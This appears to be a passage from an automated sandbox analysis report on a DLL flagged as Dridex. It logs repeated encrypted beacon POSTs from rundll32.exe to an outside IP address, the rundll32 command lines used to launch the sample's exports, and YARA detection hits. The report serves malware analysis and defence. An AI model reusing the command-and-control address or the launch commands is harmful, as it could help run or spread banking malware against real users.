                                                                                                        2021-10-28 02:53:48 UTC427OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:49 UTC432INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:49 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        87192.168.2.550139192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:50 UTC432OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:50 UTC432OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:51 UTC437INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:51 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        88192.168.2.550143192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:52 UTC437OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:52 UTC437OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:53 UTC442INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:53 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        89192.168.2.550147192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:54 UTC442OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:54 UTC442OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:55 UTC447INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:55 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        9192.168.2.549789192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:17 UTC44OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:17 UTC44OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:18 UTC54INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:17 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        90192.168.2.550151192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:56 UTC447OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:56 UTC447OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:57 UTC452INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:57 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        91192.168.2.550155192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:58 UTC452OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:58 UTC452OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:59 UTC457INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:59 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Code Manipulations

                                                                                                        Statistics

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        Analysis Process: loaddll32.exe PID: 5588 Parent PID: 5748

                                                                                                        General

                                                                                                        Start time:04:49:53
                                                                                                        Start date:28/10/2021
                                                                                                        Path:C:\Windows\System32\loaddll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll'
                                                                                                        Imagebase:0x13a0000
                                                                                                        File size:893440 bytes
                                                                                                        MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.771060361.000000006EB91000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000003.373914739.00000000016F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:moderate

                                                                                                        Analysis Process: cmd.exe PID: 2268 Parent PID: 5588

                                                                                                        General

                                                                                                        Start time:04:49:54
                                                                                                        Start date:28/10/2021
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll',#1
                                                                                                        Imagebase:0x150000
                                                                                                        File size:232960 bytes
                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Analysis Process: rundll32.exe PID: 2036 Parent PID: 5588

                                                                                                        General

                                                                                                        Start time:04:49:55
                                                                                                        Start date:28/10/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll,Bluewing
                                                                                                        Imagebase:0x1310000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000003.323665839.0000000000ED0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        Analysis Process: rundll32.exe PID: 5584 Parent PID: 2268

                                                                                                        General

                                                                                                        Start time:04:49:55
                                                                                                        Start date:28/10/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll',#1
                                                                                                        Imagebase:0x1310000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000003.326244435.0000000004CB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000002.772113565.000000006EB91000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        Analysis Process: rundll32.exe PID: 2888 Parent PID: 5588

                                                                                                        General

                                                                                                        Start time:04:50:00
                                                                                                        Start date:28/10/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll,Earth
                                                                                                        Imagebase:0x1310000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000003.362350456.0000000000CE0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        Analysis Process: rundll32.exe PID: 6116 Parent PID: 5588

                                                                                                        General

                                                                                                        Start time:04:50:11
                                                                                                        Start date:28/10/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28061.dll,Masterjust
                                                                                                        Imagebase:0x1310000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000007.00000003.370833938.0000000004CA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        Disassembly

                                                                                                        Code Analysis

                                                                                                        Reset < >